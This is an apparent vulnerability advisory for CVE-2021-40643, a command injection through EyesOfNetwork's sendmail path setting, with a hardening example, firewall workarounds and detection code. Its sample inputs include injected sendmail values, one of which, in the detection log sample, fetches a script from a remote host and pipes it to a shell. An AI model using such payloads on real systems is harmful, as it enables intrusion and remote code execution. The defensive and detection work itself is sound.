CVE-2021-40643
📋 TL;DR
CVE-2021-40643 is an authenticated remote code execution (OS command injection) vulnerability in EyesOfNetwork. The sendmail path setting on the mail configuration page (part of the bundled Cacti component, per the vendor advisory) is handed to a shell when mail is sent, so an attacker who can edit that field can append arbitrary commands, which then run with the privileges of the web server process. All EyesOfNetwork installations built before the July 7, 2021 fix are affected wherever the mail configuration page is reachable.
💻 Affected Systems
- EyesOfNetwork
📦 What is this software?
EyesOfNetwork (EON), by the EyesOfNetwork project, is an open-source IT monitoring platform that bundles Nagios Core and Cacti behind a single web interface; the affected mail configuration page belongs to the Cacti component.
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise: the injected commands run as the web server process, and an attacker who escalates from there to root can install backdoors, steal monitoring data and any credentials the monitoring server holds for the hosts it watches, and pivot to other systems.
Likely Case
Attacker executes commands to establish persistence, exfiltrate monitoring data, or deploy ransomware/cryptominers.
If Mitigated
Limited impact due to network segmentation, proper access controls, and monitoring preventing successful exploitation.
🎯 Exploit Status
Exploitation requires an authenticated session with access to the mail configuration page (in practice an administrator account). Once there, the attack is trivial: the attacker saves a sendmail path that carries shell metacharacters followed by a command of their choice, and the command runs the next time the application invokes sendmail. No memory corruption or race is involved, so reliability is high.
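The pattern behind this class of bug, shown as an added Python illustration: the vulnerable form glues the stored sendmail path into one shell command string, while the hardened form validates the setting when it is saved and later executes it as an argv list without a shell. This is not EyesOfNetwork or Cacti code (both are PHP; the same split between a shell string and an exec-style call applies there), and the function names, the allowed-directory and allowed-binary lists, and the sample inputs are assumptions made for the example.

```python
"""Why a sendmail *path* setting becomes command execution, and how to store
and use it safely. Added illustration, not EyesOfNetwork or Cacti code: the
function names and the directory/binary allow-lists are assumptions."""
import posixpath
import re
import shlex
from typing import List

# Constructed inputs: a legitimate value and one an attacker would type into the
# "sendmail path" form field. Nothing here ever reaches a real shell.
BENIGN_PATH = "/usr/sbin/sendmail"
INJECTED_PATH = "/usr/sbin/sendmail; id > /tmp/pwned"


def build_command_vulnerable(sendmail_path: str) -> str:
    """Vulnerable pattern: the stored setting is concatenated into a single
    command string that is later handed to /bin/sh (popen(), shell=True,
    backticks, ...). Everything after ';' becomes a second command."""
    return f"{sendmail_path} -t -i"


def shell_would_see(command: str) -> List[str]:
    """Tokenise a command line the way a POSIX shell would, so the second
    command introduced by ';' shows up as its own tokens."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


# Hardened handling: validate on save AND exec without a shell on use.
# Assumed policy: absolute path, safe characters only, located in a system
# binary directory, basename is a known MTA front end.
_SAFE_PATH = re.compile(r"/[A-Za-z0-9_./-]+")
ALLOWED_DIRS = {"/usr/sbin", "/usr/bin", "/usr/lib"}
ALLOWED_BASENAMES = {"sendmail", "sendmail.postfix", "sendmail.sendmail",
                     "exim4", "msmtp"}


def validate_sendmail_path(sendmail_path: str) -> str:
    """Return the normalised path or raise ValueError. Called when the setting
    is saved, so a poisoned value is never stored in the first place."""
    if not _SAFE_PATH.fullmatch(sendmail_path):
        raise ValueError("sendmail path contains characters that are not allowed")
    norm = posixpath.normpath(sendmail_path)   # collapses /usr/sbin/../sbin/x
    if posixpath.dirname(norm) not in ALLOWED_DIRS:
        raise ValueError("sendmail path is outside the allowed directories")
    if posixpath.basename(norm) not in ALLOWED_BASENAMES:
        raise ValueError("sendmail path does not name a known MTA binary")
    return norm


def build_command_hardened(sendmail_path: str) -> List[str]:
    """Return an argv list for an exec-style call (subprocess.run(argv) with
    shell=False; proc_open with an argv array in PHP). No shell parses it, so
    ';', '|', '$(...)' or backticks in the setting cannot start a command."""
    return [validate_sendmail_path(sendmail_path), "-t", "-i"]


def is_injection_attempt(sendmail_path: str) -> bool:
    """True if the hardened validator would reject the value."""
    try:
        validate_sendmail_path(sendmail_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    cmd = build_command_vulnerable(INJECTED_PATH)
    print("vulnerable string :", cmd)
    print("tokens a shell sees:", shell_would_see(cmd))
    print("hardened argv      :", build_command_hardened(BENIGN_PATH))
    print("injected rejected  :", is_injection_attempt(INJECTED_PATH))
```

The tokeniser output is the whole story: with the vulnerable string the shell sees `;` as a separator and `id > /tmp/pwned` as a second command, whereas the hardened argv never passes through a shell, and the validator would have refused to store the value anyway. The allow-lists are deliberately strict; widen them to match the MTAs actually deployed rather than dropping the checks.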
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: any EyesOfNetwork build dated after July 7, 2021 (the vendor's fix date; see the advisory for the exact package versions)
Vendor Advisory: https://www.eyesofnetwork.com/en/news/vulnerabilite-cacti
Restart Required: Yes
Instructions:
1. Update EyesOfNetwork to a build released after July 7, 2021.
2. Apply the security patch from the vendor advisory.
3. Restart the EyesOfNetwork services.
4. Verify the fix by checking the version and confirming that the mail configuration page no longer accepts a sendmail path containing shell metacharacters.
5. Inspect the currently stored sendmail path and reset it to the plain path of your MTA binary: patching the code does not necessarily clean up a value an attacker saved before the update.
🔧 Temporary Workarounds
Restrict Access to Configuration Page
Limit access to the EyesOfNetwork web interface to trusted administrator networks with host firewall rules or equivalent network controls. Because exploitation needs an authenticated session, also keep the set of accounts that can reach the configuration page as small as possible.
# Accept the web interface from the trusted admin network only (192.0.2.0/24 is a placeholder: use your own range),
# then drop everything else on those ports. Rules apply in order, so make sure no earlier rule already accepts this traffic.
iptables -A INPUT -p tcp --dport 80  -s 192.0.2.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s 192.0.2.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80  -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
Remove or Disable Mail Configuration
Temporarily disable the mail configuration page if the mail features are not required. The path and file name below are placeholders: locate the script that serves the mail settings in your installation before renaming anything, and expect mail notifications to stop while it is disabled. Disabling the page does not remove a malicious sendmail path that was saved earlier, so check the stored value as well.
# Rename the script that serves the mail settings page (placeholder path: adjust to your install)
mv /path/to/cacti/mail_config.php /path/to/cacti/mail_config.php.disabled
🧯 If You Can't Patch
- Implement strict network segmentation to isolate the EyesOfNetwork server from critical systems, and restrict its outbound connectivity so an injected command cannot easily fetch tooling or call home.
- Restrict the accounts that can edit mail settings to the few administrators who need it, and enforce strong, unique credentials, since exploitation requires an authenticated session.
- Deploy application-level WAF rules that block shell metacharacters in the sendmail path field of requests to the mail configuration page.
🔍 How to Verify
Check if Vulnerable:
The installation is vulnerable if its EyesOfNetwork build predates the July 7, 2021 fix. Confirm this from the version rather than by injecting a command on a production system. Separately, inspect the stored sendmail path: anything other than a plain absolute path to the MTA binary (for example a value containing `;`, `|`, `&`, `$`, or backticks) indicates the field has already been abused.
Check Version:
# Version file path as given on this page; if it does not exist, read the version from the admin panel of the web interface
grep -i 'version' /usr/share/eyesofnetwork/version.txt 2>/dev/null || echo "version file not found: check the EyesOfNetwork web interface admin panel"
Verify Fix Applied:
Confirm that the EyesOfNetwork version now postdates July 7, 2021, that the mail configuration page rejects (or neutralises) a sendmail path containing shell metacharacters, and that the stored sendmail path is a plain absolute path to the MTA binary.
📡 Detection & Monitoring
Log Indicators:
- Shell metacharacters or command strings in requests to the mail configuration page (visible only where your logging captures request bodies, which standard access logs do not)
- Failed authentication attempts followed by successful access to configuration pages
- Execution of unexpected system commands from web server process
Network Indicators:
- Unusual outbound connections from EyesOfNetwork server
- HTTP POST requests to mail configuration endpoints with suspicious payloads
SIEM Query:
The query below is pseudo-syntax to adapt to your SIEM. The `uri` values are placeholders for the actual mail configuration endpoint in your installation, and the `payload` field assumes a log source (WAF, reverse proxy or application audit log) that records form bodies; plain web server access logs do not contain them.
source="web_server.log" AND (uri="/cacti/mail_config" OR uri="/mail/configure") AND (method="POST" OR method="PUT") AND (payload="sendmail" OR payload="cmd" OR payload="bash" OR payload="sh")
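Detection logic for two of the indicators above, as an added Python example that is not EyesOfNetwork tooling: a POST to the mail configuration page whose sendmail field carries shell metacharacters, and a successful login that follows a burst of failures from the same source. It runs over constructed JSON records from a hypothetical reverse proxy or WAF that logs form bodies; the record format, the `/login` endpoint, the `sendmail_path` parameter name and the mail configuration URIs (taken from the SIEM query on this page) are placeholders to adapt.

```python
"""Detection for two indicators: an injected sendmail field posted to the mail
configuration page, and a login success after repeated failures from the same
source. Added example, not EyesOfNetwork code; record format, field names and
endpoints are assumptions to adapt to your own log source."""
import json
import re
from typing import Dict, List
from urllib.parse import parse_qs

# Constructed records, as a reverse proxy or WAF that logs form bodies might
# emit them (standard access logs do NOT contain POST bodies). Not real traffic.
SAMPLE_LOG = """\
{"ts":"2021-07-01T09:12:03Z","src_ip":"10.0.5.21","method":"POST","uri":"/cacti/mail_config","status":200,"body":"sendmail_path=%2Fusr%2Fsbin%2Fsendmail&mail_from=eon%40example.org"}
{"ts":"2021-07-01T22:40:11Z","src_ip":"203.0.113.9","method":"POST","uri":"/login","status":401,"body":"user=admin&pass=REDACTED"}
{"ts":"2021-07-01T22:40:14Z","src_ip":"203.0.113.9","method":"POST","uri":"/login","status":401,"body":"user=admin&pass=REDACTED"}
{"ts":"2021-07-01T22:40:19Z","src_ip":"203.0.113.9","method":"POST","uri":"/login","status":401,"body":"user=admin&pass=REDACTED"}
{"ts":"2021-07-01T22:41:02Z","src_ip":"203.0.113.9","method":"POST","uri":"/login","status":302,"body":"user=admin&pass=REDACTED"}
{"ts":"2021-07-01T22:41:30Z","src_ip":"203.0.113.9","method":"GET","uri":"/cacti/mail_config","status":200,"body":""}
{"ts":"2021-07-01T22:42:05Z","src_ip":"203.0.113.9","method":"POST","uri":"/cacti/mail_config","status":200,"body":"sendmail_path=%2Fusr%2Fsbin%2Fsendmail%3Bcurl+http%3A%2F%2F198.51.100.7%2Fx%7Csh&mail_from=eon%40example.org"}
"""

MAIL_CONFIG_URIS = ("/cacti/mail_config", "/mail/configure")  # placeholders from the page's SIEM query
LOGIN_URI = "/login"                                          # assumed
SENDMAIL_FIELD = re.compile(r"sendmail", re.IGNORECASE)
# Shell metacharacters that have no business in a path to an MTA binary.
METACHARS = re.compile(r"[;|&`<>\n\r]|\$\(|\$\{")


def parse_log(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def injected_fields(body: str) -> Dict[str, str]:
    """Form fields whose name mentions sendmail and whose URL-decoded value
    contains shell metacharacters."""
    hits: Dict[str, str] = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if SENDMAIL_FIELD.search(name):
            for value in values:
                if METACHARS.search(value):
                    hits[name] = value
    return hits


def detect_sendmail_injection(records: List[Dict]) -> List[Dict]:
    """Alert on a POST/PUT to a mail configuration URI with an injected field."""
    alerts = []
    for r in records:
        if r.get("method") not in ("POST", "PUT"):
            continue
        path = r.get("uri", "").split("?", 1)[0]
        if not path.startswith(MAIL_CONFIG_URIS):
            continue
        hits = injected_fields(r.get("body", ""))
        if hits:
            alerts.append({"rule": "sendmail_path_injection", "ts": r["ts"],
                           "src_ip": r["src_ip"], "fields": hits})
    return alerts


def detect_success_after_failures(records: List[Dict], threshold: int = 3) -> List[Dict]:
    """Alert when a source logs in successfully after >= threshold failures."""
    failures: Dict[str, int] = {}
    alerts = []
    for r in records:
        if r.get("method") != "POST" or r.get("uri", "").split("?", 1)[0] != LOGIN_URI:
            continue
        ip = r["src_ip"]
        if r.get("status") == 401:
            failures[ip] = failures.get(ip, 0) + 1
        elif r.get("status") in (200, 302):
            if failures.get(ip, 0) >= threshold:
                alerts.append({"rule": "login_success_after_failures", "ts": r["ts"],
                               "src_ip": ip, "failures": failures[ip]})
            failures[ip] = 0
    return alerts


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for alert in detect_success_after_failures(recs) + detect_sendmail_injection(recs):
        print(json.dumps(alert))
```

On the constructed sample both rules fire for 203.0.113.9: three 401s followed by a 302 on the login endpoint, then a POST whose decoded sendmail_path is `/usr/sbin/sendmail;curl http://198.51.100.7/x|sh`. The earlier benign save from 10.0.5.21 produces nothing, because a plain absolute path contains none of the metacharacters the rule looks for; that keeps the rule quiet on legitimate configuration changes.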